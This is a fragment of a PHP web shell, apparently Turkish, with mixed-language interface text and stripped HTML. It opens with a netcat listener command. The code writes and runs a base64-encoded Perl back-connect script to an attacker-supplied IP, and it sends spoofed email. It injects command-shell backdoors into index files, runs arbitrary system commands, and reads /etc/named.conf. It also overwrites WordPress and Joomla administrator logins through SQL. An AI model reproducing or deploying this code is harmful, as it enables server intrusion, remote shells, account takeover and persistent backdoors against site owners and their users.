Netcat aç bu komutu uygula: nc -l -p 1542


:



'; $pip=$_POST['pip'];$pport=$_POST['pport']; if ($pip <>'') { $fp=fopen($_POST['ppath'].DS.rand(0,10).'bc_perl_enhack.pl','w'); if (!$fp){ $Sonuç = 'Error: couldn\'t write file to open socket connection'; }else { @fputs($fp,base64_decode($bc_perl)); fclose($fp); $Sonuç = ex('perl '.$_POST['ppath'].'/bc_perl_enhack.pl '.$pip.' '.$pport.' &'); } } } if ($_GET[id]=='feykmail'){ echo "
"; if( isset($_POST['sendamail']) && isset($_POST['from']) && isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['text']) ) { $err = 'Errore invio !'; $ok = 1; $from = $_POST['from']; $to = $_POST['to']; $subject = $_POST['subject']; $message = $_POST['text']; $headers = "From: $from"; if( isset( $_FILES['uploaded'] ) &&$uploaded_size ) { $target = './uploads/'; $target = $target .basename( $_FILES['uploaded']['name'] ) .'.dat'; if($uploaded_size >350000) { $err = 'Allegato troppo grande (max 350 KB) !'; $ok = 0; } if( !move_uploaded_file($_FILES['uploaded']['tmp_name'],$target) ) { $err = "Impossibile uploadare l'allegato !"; $ok = 0; } else { $fileatt = $target; $fileatt_type = 'application/octet-stream'; $fileatt_name = basename( $_FILES['uploaded']['name'] ); $file = fopen($fileatt,'rb'); $data = fread($file,filesize($fileatt)); fclose($file); $semi_rand = md5(time()); $mime_boundary = "==Multipart_Boundary_x{$semi_rand}x"; $headers .= " MIME-Version: 1.0 ". "Content-Type: multipart/mixed; ". " boundary=\"{$mime_boundary}\""; $message .= "This is a multi-part message in MIME format. ". "--{$mime_boundary} ". "Content-Type:text/html; charset=\"iso-8859-1\" ". "Content-Transfer-Encoding: 7bit ". $message ." "; $data = chunk_split(base64_encode($data)); $message .= "--{$mime_boundary} ". "Content-Type: {$fileatt_type}; ". " name=\"{$fileatt_name}\" ". "Content-Transfer-Encoding: base64 ". $data ." ". "--{$mime_boundary}-- "; } } if( !$ok ) { echo "$err"; @unlink($target); } else { if( @mail( $to,$subject,$message,$headers) ){ echo 'Email Yollandi'; } else echo "$err"; @unlink($target); } } } if ($_GET[id]=='command2'){ echo " '; } if ($_GET[a]=='reverse'){ $site = "$_GET[site]"; $kaynak = file_get_contents("http://whatisonip.com/domain-info/$site"); preg_match_all('##si',$kaynak,$kursat); foreach($kursat[1] as $cem) { echo str_replace('?','',$cem).'
'; } } if ($_GET[id]=='reversem'){ echo '
http://www. Koymadan yazýn site.com gibi '; echo '
'; $site = "$_POST[site]"; $kaynak = file_get_contents("http://whatisonip.com/domain-info/$site"); preg_match_all('##si',$kaynak,$kursat); foreach($kursat[1] as $cem) { echo str_replace('?','',$cem).'
'; } } if ($_GET[id]=='md5'){ echo '

'; if(isset($_POST['md5_send'])) { if(empty($_POST['md5_text'])) { die ('you don\'t type word for make hash'); } $word=$_POST['md5_text']; $word2 = md5("$word"); print("$word hash = $word2"); } } if ($_GET[id]=='Cmdinject'){ echo "

"; if (isset($_POST['Submit4'])) { $IName = (@$_POST['IndexName']); if ($IName == '') { echo '[+] Plz Insert Index Name, For Previous Directory Use ( ../ ) Symbol .
'; } else { $CMD = ''; $FFP = @fopen($IName,'a'); $fWrite = @fwrite($FFP,$CMD); if ($fWrite) { echo '[+] CMD Sheller Successful Inj3cted .
'; } else { echo '[+] No Perm !
'; } } } } if ($_GET[id]=='uzakupload'){ echo ''; if (isset($_POST['upload'])) {$savefile = getcwd().'/'.$_FILES['file']['name']['0'];move_uploaded_file($_FILES['file']['tmp_name']['0'],$savefile);$filesizename = array(' Bytes',' KB',' MB',' GB',' TB',' PB',' EB',' ZB',' YB');$size = round($_FILES['file']['size']['0']/pow(1024,($i = floor(log($_FILES['file']['size']['0'],1024)))),2) .$filesizename[$i];print 'Uploaded be completed !
Details:
Filename: '.$_FILES['file']['name']['0'] .'.
Size: '.$size .'.';} echo '
Upload Files:


'; if (isset($_POST['upload_url'])) {$file=$_POST['upload_url_text'];$newfile=$_POST['rename'];if (!copy($file,$newfile)) {echo "failed to copy $file... ";}} echo 'Upload Files From URL:

Rename to:
'; } if ($_GET[id]=='CloudBypass'){ echo '


+--=[ Bypass CloudFlare ]=--+

'; $target = $_POST['target']; if($_POST['krz'] == 'ftp') { $ftp = gethostbyname('ftp.'."$target"); echo "

Correct ip is : $ftp

"; } if($_POST['krz'] == 'direct-conntect') { $direct = gethostbyname('direct-connect.'."$target"); echo "

Correct ip is : $direct

"; } if($_POST['krz'] == 'webmail') { $web = gethostbyname('webmail.'."$target"); echo "

Correct ip is : $web

"; } if($_POST['krz'] == 'cpanel') { $cpanel = gethostbyname('cpanel.'."$target"); echo "

Correct ip is : $cpanel

"; } } if ($_GET[id]=='read'){ echo 'read /etc/named.conf'; echo "



"; if(isset($_GET['save'])){ $cont = stripcslashes($_POST['file']); $f = fopen('named.txt','w'); $w = fwrite($f,$cont); if($w){ echo '
Kayit tamam'; } fclose($f); } function ex($text,$a,$b){ $explode = explode($a,$text); $explode = explode($b,$explode[1]); return $explode[0]; } } if ($_GET[id]=='sifrele'){ $text = $_POST['code']; echo "





  "; $submit = $_POST['submit']; if (isset($submit)){ $op = $_POST['ope']; switch ($op) {case 'base64': $codi=base64_encode($text); break;case 'str': $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text))))); break;case 'gzinflate': $codi=base64_encode(gzdeflate(str_rot13($text))); break;default:break;}} $submit = $_POST['submits']; if (isset($submit)){ $op = $_POST['ope']; switch ($op) {case 'base64': $codi=base64_decode($text); break;case 'str': $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text))))); break;case 'gzinflate': $codi=str_rot13(gzinflate(base64_decode($text))); break;default:break;}} echo '

'; } if ($_GET[id]=='hash'){ $submit= $_POST['enter']; if (isset($submit)) { $pass = $_POST['password']; $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; $hash = md5($pass); $md4 = hash('md4',$pass); $hash_md5 = md5($salt.$pass); $hash_md5_double = md5(sha1($salt.$pass)); $hash1 = sha1($pass); $sha256 = hash('sha256',$text); $hash1_sha1 = sha1($salt.$pass); $hash1_sha1_double = sha1(md5($salt.$pass)); } echo '
Yollayan Adres
Gidecek Adres
Konu Baslik
Dosya ekle
Mesaj
"; if (empty($_POST['z3r'])){ echo ''; echo ''; echo ''; echo ''; }else{ $b4se64 =$_POST['z3r']; $heno =base64_encode($b4se64); echo '

'; echo ''; } echo '

'; if( !empty($_POST['cz']) ) if ($dec=='decode'){echo '
';} echo "

'; echo '
Backdoorlanacak dosya :
Örnek : index.php
'; echo ''; echo ''; echo '
'; echo ''; echo '

'; echo '

'; echo '

'; echo '

'; echo '

'; echo '

'; echo '

'; echo '

'; echo '

Password Hash
masukan kata yang ingin di encrypt:'; echo ''; echo '
Hasil Hash
Original Password
MD5
MD4
MD5 with Salt
MD5 with Salt & Sha1
Sha1
Sha256
Sha1 with Salt
Sha1 with Salt & MD5
'; } if ($_GET[id]=='wpres'){ echo ''; if(empty($_POST['pwd'])){ echo "
Connect to mySQL server
  Hostname
  Database
  username
  password
  User baru
  Pass Baru  




"; }else{ $localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $pwd = $_POST['pwd']; $admin = $_POST['admin']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $hash = crypt($pwd); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error()); if($a4s){ echo ' Success ..!! :)) sekarang bisa login ke wp-admin '; } } echo '
'; } if ($_GET[id]=='joomlares'){ echo '
'; if(empty($_POST['pwd'])){ echo "
Connect to mySQL
  Host
  Database
  username
  password
  User baru
  pass baru 123456 =  




"; }else{ $localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $pwd = $_POST['pwd']; $admin = $_POST['admin']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $hash = crypt($pwd); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error()); if($SQL){ echo 'Success : skarang password barunya >>> - (123456)'; } } echo ' '; } if ($_GET[id]=='komut'){ function cmd() { $cmd = $_POST['cmd']; $cmdgo = $_POST['cmdgo']; $option = $_POST['option']; $id = $_GET['id']; if($cmdgo &&!empty($cmd)) { switch($option) { case system: system($cmd); break; case passthru: passthru($cmd); break; case shell_exec: $out = shell_exec($cmd); echo $out; break; default; system($cmd); } } } echo "

'; } if ($_GET[id]=='lite1'){ echo "

# Litespeed þansýný dene ~    

"; $command = $_POST['command']; $z00z = $_POST['z00z']; if($command){ $z11d = "


http://www.imhatimi.org




 

";
$openfile = fopen('mec.shtml','w');
$writeinto = fwrite($openfile,"$z11d");
fclose($openfile);
if($openfile){
}else{
}
}
echo "